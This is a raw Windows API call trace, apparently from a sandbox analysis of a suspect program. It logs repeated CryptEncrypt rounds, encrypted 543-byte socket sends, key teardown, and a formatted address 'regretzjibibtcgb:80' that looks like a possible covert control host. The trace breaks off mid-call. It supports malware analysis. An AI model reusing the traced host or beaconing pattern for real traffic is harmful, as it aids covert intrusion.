[0144.435] free (_Block=0x0) [0144.435] malloc (_Size=0x1fd) returned 0x3d81e60 [0144.435] free (_Block=0x0) [0144.435] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.435] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.435] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.436] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.437] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.437] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.437] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.437] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.437] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.437] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.437] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.437] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.437] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.437] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.437] malloc (_Size=0x1fd) returned 0x3f68420 [0144.437] free (_Block=0x0) [0144.437] free (_Block=0x3f68218) [0144.437] free (_Block=0x3d81e60) [0144.437] free (_Block=0x3f68010) [0144.437] malloc (_Size=0x202) returned 0x3d81e60 [0144.437] free (_Block=0x0) [0144.437] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339f9d4, MessageSeqNo=0x0 | out: pMessage=0x339f9d4) returned 0x0 [0144.437] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0144.438] free (_Block=0x3d81e60) [0144.438] free (_Block=0x3f69828) [0144.438] free (_Block=0x3f68420) [0144.438] free (_Block=0x3def420) [0144.438] free (_Block=0x3def010) [0144.438] free (_Block=0x3dd48d8) [0144.438] free (_Block=0x3f652c0) [0144.438] GetTickCount () returned 0x116500c [0144.438] malloc (_Size=0x10) returned 0x3648d10 [0144.438] free (_Block=0x0) [0144.438] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d10*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0144.438] free (_Block=0x3648d10) [0144.438] GetTickCount () returned 0x116500c [0144.438] malloc (_Size=0x10) returned 0x3648ce0 [0144.438] free (_Block=0x0) [0144.439] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648ce0*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0144.801] free (_Block=0x3648ce0) [0144.801] GetTickCount () returned 0x1165173 [0144.801] GetTickCount () returned 0x1165173 [0144.801] malloc (_Size=0x10) returned 0x3648cf8 [0144.801] free (_Block=0x0) [0144.801] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648cf8*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0144.801] free (_Block=0x3648cf8) [0144.801] GetTickCount () returned 0x1165173 [0144.801] malloc (_Size=0x10) returned 0x3648d40 [0144.801] free (_Block=0x0) [0144.801] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648d40*=0x3a4, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0145.379] free (_Block=0x3648d40) [0145.379] GetTickCount () returned 0x11653c5 [0145.379] malloc (_Size=0x202) returned 0x3d81e60 [0145.379] free (_Block=0x0) [0145.380] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fa94, MessageSeqNo=0x0 | out: pMessage=0x339fa94) returned 0x0 [0145.380] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0145.380] free (_Block=0x3d81e60) [0145.380] free (_Block=0x0) [0145.380] CryptDestroyKey (hKey=0x432bf8) returned 1 [0145.382] free (_Block=0x3df00e0) [0145.382] CryptDestroyHash (hHash=0x432db8) returned 1 [0145.382] CryptDestroyHash (hHash=0x432d78) returned 1 [0145.382] CryptDestroyKey (hKey=0x432cb8) returned 1 [0145.382] CryptDestroyKey (hKey=0x4329f8) returned 1 [0145.382] free (_Block=0x3594d18) [0145.382] free (_Block=0x36244b0) [0145.382] CryptDestroyKey (hKey=0x432e78) returned 1 [0145.382] free (_Block=0x3691270) [0145.382] CryptDestroyHash (hHash=0x432eb8) returned 1 [0145.382] CryptDestroyHash (hHash=0x432d38) returned 1 [0145.382] CryptDestroyKey (hKey=0x4327b8) returned 1 [0145.382] CryptDestroyKey (hKey=0x432738) returned 1 [0145.383] free (_Block=0x605a18) [0145.383] free (_Block=0x3624470) [0145.383] SetEvent (hEvent=0x5c8) returned 1 [0145.383] SetEvent (hEvent=0x5cc) returned 1 [0145.383] free (_Block=0x3648cb0) [0145.383] free (_Block=0x0) [0145.383] CloseHandle (hObject=0x5cc) returned 1 [0145.383] CloseHandle (hObject=0x5c8) returned 1 [0145.383] free (_Block=0x3d9ae00) [0145.383] _vscprintf (_Format="%s:%hi", _ArgList=0x339fb38) returned 19 [0145.383] malloc (_Size=0x14) returned 0x3f65280 [0145.383] free (_Block=0x0) [0145.383] vsprintf_s (in: _DstBuf=0x3f65280, _SizeInBytes=0x14, _Format="%s:%hi", _ArgList=0x339fb38 | out: _DstBuf="regretzjibibtcgb:80") returned 19 [0145.383] malloc (_Size=0x14) returned 0x3f652c0 [0145.383] free (_Block=0x0) [0145.383] malloc (_Size=0x78) returned 0x3d66d30 [0145.383] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5c8 [0145.384] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5cc [0145.384] malloc (_Size=0x20) returned 0x3d802b0 [0145.384] free (_Block=0x0) [0145.384] SetEvent (hEvent=0x3a4) returned 1 [0145.384] malloc (_Size=0x14) returned 0x3f65340 [0145.384] free (_Block=0x0) [0145.384] free (_Block=0x0) [0145.384] malloc (_Size=0x1fd) returned 0x3d81e60 [0145.384] free (_Block=0x0) [0145.384] CryptHashData (hHash=0x432978, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0145.384] CryptDuplicateHash (in: hHash=0x432978, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fabc | out: phHash=0x339fabc) returned 1 [0145.384] malloc (_Size=0x14) returned 0x3f65520 [0145.384] free (_Block=0x0) [0145.384] CryptGetHashParam (in: hHash=0x3e10d8, dwParam=0x2, pbData=0x3f65520, pdwDataLen=0x339fa54, dwFlags=0x0 | out: pbData=0x3f65520, pdwDataLen=0x339fa54) returned 1 [0145.384] CryptDestroyHash (hHash=0x3e10d8) returned 1 [0145.384] free (_Block=0x3f65520) [0145.384] malloc (_Size=0x1fd) returned 0x3691270 [0145.384] free (_Block=0x0) [0145.384] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.384] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.384] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.385] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.386] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.386] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.386] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.386] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.386] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.386] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.386] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.386] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.386] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.386] CryptEncrypt (in: hKey=0x3e1058, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x3691934*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.386] malloc (_Size=0x1fd) returned 0x3df00e0 [0145.386] free (_Block=0x0) [0145.386] free (_Block=0x0) [0145.386] free (_Block=0x3691270) [0145.386] free (_Block=0x3d81e60) [0145.386] malloc (_Size=0x1fd) returned 0x3d81e60 [0145.386] free (_Block=0x0) [0145.386] malloc (_Size=0x1fd) returned 0x3691270 [0145.386] free (_Block=0x0) [0145.386] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.387] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, dwBufLen=0x10 | out: pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10) returned 1 [0145.388] CryptEncrypt (in: hKey=0x432cf8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef0c*, pdwDataLen=0x339fa0c*=0x10, 